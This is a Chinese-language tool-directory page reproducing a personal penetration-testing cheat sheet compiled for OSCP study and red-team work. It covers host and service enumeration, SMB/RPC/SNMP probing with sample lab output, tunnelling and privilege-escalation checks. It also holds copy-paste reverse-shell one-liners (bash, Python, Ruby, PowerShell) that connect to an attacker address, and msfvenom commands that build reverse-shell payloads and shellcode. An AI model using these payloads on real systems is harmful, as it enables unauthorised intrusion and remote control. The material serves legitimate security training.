Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Pentest-Cheat-Sheet — 网上的速查表有很多,但这份是我的。 | Kitploit
工具/GitHubGitHub/d0n601/pentest-cheat-sheet
密码破解权限提升侦察漏洞利用横向移动Web应用程序漏洞利用渗透测试学习与教育红队精选资源
GitHubd0n601/pentest-cheat-sheet

Pentest-Cheat-Sheet

389181年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

网上的速查表有很多,但这份是我的。

查看仓库

渗透测试速查表

网上有很多速查表,但这是我自己整理的一份。目前仍在完善中,作为一份粗略草稿,有时会更新很多。我在备考 OSCP 时开始编写这份速查表,但现在它已发展为包含更多我作为红队成员所需的实用内容。新增内容很可能对考试没有用处,甚至可能包含被禁止使用的工具。

侦察

非常不完整...

Linux 本地

find / -name flag.txt 按名称查找文件。

grep -R "flag40" / -s -n 从根目录递归搜索文件内容以寻找字符串,不输出错误信息。

Windows 本地

dir /s flag.txt 在当前目录及子目录中查找名为 flag.txt 的文件。

Active Directory(活动目录)

一个有用的工具 -> wadcoms.github.io

端口扫描

nmap

nmap -sn 10.11.1.0/24 网络扫描,发现存活主机。

  • nmap -sn 10.11.1.0/24 -oG - | awk '/Up$/{print $2}' > list_ips.txt 扫描网络中存活的主机,并将 IP 地址保存到列表。

nmap -A 10.10.10.10 快速扫描常见 TCP 端口,并进行操作系统和服务检测。

nmap -A 10.10.10.10 -p- 扫描所有 TCP 端口,并进行操作系统和服务检测。

nmap -A -sU 10.10.10.10 扫描所有 UDP 端口,并进行操作系统和服务检测。

sudo nmap -O -A -sV 10.10.10.10 扫描所有常见 TCP 端口,识别操作系统指纹,运行脚本并获取横幅(banner)。

通过 Proxychains

proxychains nmap -Pn -sT 10.10.10.10 -v 因为 ICMP/UDP 扫描不可用。

Netat

-w 参数用于指定超时秒数,-z 参数用于发送零数据(用于扫描)。

nc -nvv -w 1 -z 10.11.1.220 3388-3390 TCP 扫描端口 3388-3390。

nc -nv -u -z -w 1 10.11.1.115 160-162 UDP 扫描端口 160-162。

目录枚举

Gobuster

  • 目录爆破示例 gobuster dir -u http://10.1.1.27 -w /usr/share/wordlists/dirb/big.txt。

我也喜欢 dirsearch。

Kali 上有用的字典:

kali@kali:~/Tools/dirsearch$ ls /usr/share/wordlists
dirb  dirbuster  fasttrack.txt  fern-wifi  metasploit  nmap.lst  rockyou.txt  rockyou.txt.gz  wfuzz
kali@kali:~/Tools/dirsearch$ ls /usr/share/seclists
Discovery  Fuzzing  IOCs  Miscellaneous  Passwords  Pattern-Matching  Payloads  README.md  Usernames  Web-Shells
kali@kali:~/Tools/dirsearch$ 

python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirb/big.txt -r 使用 dirb 的 big.txt 进行目录枚举,复制粘贴并替换 IP/URL 和扩展名即可。

python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r 使用 dirbuster 的目录字典进行目录枚举,复制粘贴并替换 IP/URL 和扩展名即可。

python3 dirsearch.py -u http://10.11.1.71 -t 100 -e cgi -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -r,暴力破解 CGI。

枚举共享文件夹(rsync)

rsync 模块本质上是一个目录共享。这些模块可以选择通过密码保护。此选项列出可用的模块,并可确定访问该模块是否需要密码**:**

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>

SMB 枚举

手动

smbclient -L 10.11.1.146 列出可用共享。

smbclient //10.11.1.146/IPC$ 登录到该共享。如果不成功,请尝试 sudo... sudo smbclient //10.11.1.146/IPC$

自动化

enum4linux 10.11.1.146 -a -o 使用 enum4linux 自动化枚举 SMB 共享。

RPC 枚举

如果可以使用 Null 登录进行连接 -> rpcclient -U '' -N forest.htb。

rpcclient $> querydomaininfo
command not found: querydomaininfo
rpcclient $> querydominfo
Domain:         HTB
Server:
Comment:
Total Users:    105
Total Groups:   0
Total Aliases:  0
Sequence No:    1
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> 

好文章 另一篇好文

NFS

showmount -e 10.10.10.10 查看可用的挂载。 mount -t nfs 10.10.10.10:/ /tmp -o nolock 挂载根目录或其他目录。

SNMP 枚举

onesixtyone -c community -i ips 扫描目标网络以识别 SNMP 服务器,其中 community 和 ips 是列表,community =(public, private, manager)。

snmp-check 10.11.1.227 会完成下面所有操作,但效果更好,而且会为你格式化输出 :)

snmpwalk -c public -v1 -t 10 10.11.1.115 枚举整个 MIB 树。

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 枚举 Windows 用户。

snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2 枚举 Windows 正在运行的进程。

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3 枚举打开的 TCP 端口。

snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2 枚举已安装的软件。

反向 Shell

Bash

/bin/bash -i >& /dev/tcp/192.168.119.137/1337 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.10.14.3",8081).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PowerShell

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.137',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

监听器

Netat

nc -lvp 4444 使用 Netcat 在端口 4444 上监听(接收)反向 Shell。

生成 TTY Shell

python -c 'import pty; pty.spawn("/bin/bash")' 或 python3 -c 'import pty; pty.spawn("/bin/bash")'

MSFVenom

ASP

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f asp > shell.asp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f war > shell.war

JSP

这也适用于 Cold Fusion,而不是使用疯狂的 Web Shell。 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f raw > shell.jsp

Linux 二进制文件

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.133 LPORT=443 -f elf > shell.elf

Shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\3d" 编码坏字符,生成 Windows shell。

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -b "\x00\x20" -f py -v shellcode Linux,可选择 Python 输出。

隧道与内网渗透

本地端口转发。下面的示例允许访问 pandora.htb 上仅在 localhost 可用的服务。 ssh -L 127.0.0.1:9050:pandora.htb:80 [email protected]

动态端口转发。 ssh -D 9050 [email protected]

RDP 技巧

如果 rdesktop 因报错 Certificate recieved from server is NOT trusted by this sytem,... 而失败,请使用 xfreerdp。

proxychains4 xfreerdp /u:dev /v:10.0.0.5:3389

提权

Linux

sudo -l,如果其中有类似以 NOPASSWD: ALL 方式以其他用户运行脚本的有趣内容。

发行版版本

  • cat /etc/issue

内核版本和架构

  • uname -r
  • arch

查找可写目录

find / -writable -type d 2>/dev/null

查看 SUID 二进制文件

find / -perm -u=s -type f 2>/dev/null

正在运行的进程

ps axu

检查正在监听的服务

ss -lnpt

计划任务

ls -la /etc/cron.d 打印 cron.d 中已有的计划任务。

Windows

powershell -c "Invoke-WebRequest -Uri http://10.10.14.10/39719.ps1 -OutFile ./39719.ps1 傻瓜式文件传输

systeminfo 获取有用的系统信息。

tasklist /SVC 查看正在运行的服务。

sc queryex type=service state=all 查询所有服务,无论是否正在运行。

查找内核漏洞

Windows Exploit Suggester

交叉编译漏洞利用

i686-w64-mingw32-gcc shell.c -o shell.exe 32 位 Windows i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32

x86_64-w64-mingw32-gcc 271.c -o 271.exe 64 位 Windows

文件传输

下载工具